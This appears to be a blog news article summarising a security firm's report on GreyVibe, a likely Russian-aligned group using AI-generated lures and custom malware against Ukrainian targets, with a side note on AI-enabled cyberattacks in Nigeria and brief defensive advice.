AI technology is rapidly expanding and so is cyber attack. This rapid increase in cyber attack around the world, is facilitated by AI tools that enables easy production of digital products used for fast, convincing and nearly untraceable cyber attacks by Internet hackers.
With AI tools today, anyone without prior knowledge of coding can create a software is matter of minutes using AI tools like Replit, Claude, Gemini and more!
Recently, A likely Russian threat group tracked as GreyVibe has been discovered to be using AI-generated lures and a rich set of custom malware tools to target entities in the military, government, civilian, and business sectors.
The cyberespionage campaign has been active since at least August 2025 and appears to align with Russian state interests, although researchers cannot confidently classify it as a nation-state operation.
Cybersecurity company WithSecure discovered the activity in January this year and determined that its focus is on Ukrainian or Ukraine-related organizations.
The link to a Russian-speaking threat actor is supported by the language for the malware panels, comments in code artifacts, and command-and-control (C2) server time configured to UTC+3 (Moscow time).
According to the researchers, GreyVibe has used several attack chains against its targets, including:
PhantomMail: Spear-phishing emails delivering malicious ZIP/RAR archives via Google Drive and 4sync links, using decoy PDFs or fake errors while deploying malware. The observed lures impersonated Ukrainian government, emergency, telecom, and energy entities.
PhantomClick: Fake CAPTCHA/ClickFix pages disguised as Zoom and LAPAS sites trick victims into running self-infecting commands through fake Cloudflare verification prompts.
PrincessClub: Fake Ukrainian adult/dating websites delivering FallSpy Android spyware and PhantomRelay/LegionRelay Windows malware. The operators used fake female Telegram personas and later added WebRTC-based live calls that could capture the victim’s audio/video.
DroneLink: Fake Ukrainian military charity websites themed around FPV drones and UAVs shared infrastructure and tooling with PrincessClub campaigns.
Nebo: Fake “СПО НЕБО” Russian military communications login pages were likely designed to trick Ukrainian military personnel into believing they were accessing a Russian military terminal.
The diversity and quality of these lures are notable, and WithSecure says this is the result of using multiple AI tools, including ChatGPT, Ideogram AI, and Google Gemini, to generate detailed and realistic content to support them.
The use of AI extends to the creation of tools as well, with the researchers mentioning LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, all custom obfuscators that were likely developed with LLM assistance.
A PowerShell-based remote access trojan named LegionRelay was also likely developed with assistance from AI tools, the researchers say.
LegionRelay supports file theft, screenshot capturing, browser credential theft, Telegram and WhatsApp data exfiltration, and RDP access setup.
Another malware used by GreyVibe is PhantomRelay, also a PowerShell RAT. The malware supports system fingerprinting, dynamic script loading, and PowerShell and Windows command execution.
Picture Showing a list of Malwares and Viruses used by Greyvibe to carry out cyber attacks on Ukraine – Photo Credit: WithSecure
Finally, the hackers employed the FallSpy Android spyware on the PrincessClub and Nebo campaigns, which is designed purely for collecting intelligence.
The malware collects contact lists, call logs, device and network information, location data, media files, and SIM information.
WithSecure notes that while GreyVibe activity is consistent with a nation-state operation, the threat actor “lacked the level of sophistication and operational discipline typically associated with mature nation-state actors.”
Furthermore, the PhantomRelay malware has been seen in cybercrime activity, although researchers could distinguish its usage from state-aligned operations. This led the researchers to believe that GreyVibe may include “current or former cybercriminal actors.”
AI tools make it much easier for Greyvibe cyber hacking group to create these Malwares, Viruses, Links and Highly convincing AI generated media outputs used for carrying out cyber attacks on top Ukrainian government officials, military and business men.
Picture Showing Gemini AI Tools Used to generate AI Media used to carry Cyber Attack by Greyvibe – Photo Credit: WithSecure
Some evidence pointing to this theory includes the use in early and test samples of a unique ISO builder associated with a group of former TrickBot members (UAC-0098) that targeted Ukraine at the start of the Russian invasion.
Furthermore, the threat actor uploaded development and test samples to a public scanning platform, which is not typical with nation-state actors. Additionally, a cryptocurrency miner was deployed on some victim machines.
The researchers are unsure “whether former or current cybercriminal members have been absorbed into a state-backed group, operate independently but with state-directed tasking, or have formed a hybrid team involving state-affiliated and cybercriminal members.”
A Potential Disaster Looming from raising AI Powered Cyberattacks
Ai sponsored cyber attacks have been on the rise in recent times. in Nigeria today, over 4200 cyber attacks are carried out daily on Nigerian business, institutions, and citizens. These cyber attacks have been made easy to orchestrate with AI powered tools that easily write virus malwares and creates highly convincing media products used to carry out cybercrime.
Recently, the Nigerian Corporate Affairs Commission suffered a huge cyber attack carried out by international cyber criminal group ByteToReach. This massive cyber attack on the sole organization mandated with handling and safeguarding Nigeria’s Corporate Business Information saw over 25Million highly sensitive business information and 750Giga Byte worth of business data whisked away by the international cyber attack group.
This cyber attack by Russian threat group tracked as GreyVibe discovered to be carried out using AI-generated lures and a rich set of custom malware tools is targeted at Top Ukrainian entities in the military, government, civilian, and business sectors. This further reveals how AI cyber attack tools can be used to promote Data theft, Insecurity, fighting and bloodshed.
What To Do by Organizations Facing AI Powered Cyberattacks
AI enabled Cyberattacks are rapidly spiralling across the world. Organizations can set up defenses against GreyVibe’s malicious activity by using the indicators of compromise (IoCs) provided by WithSecure. Furthermore, Organizations should ensure to replace outdated Cybersecurity Systems with Modern infrastructure and ensure prompt training of workers/employees on potential AI powered attacks to look out for.
Leave a Reply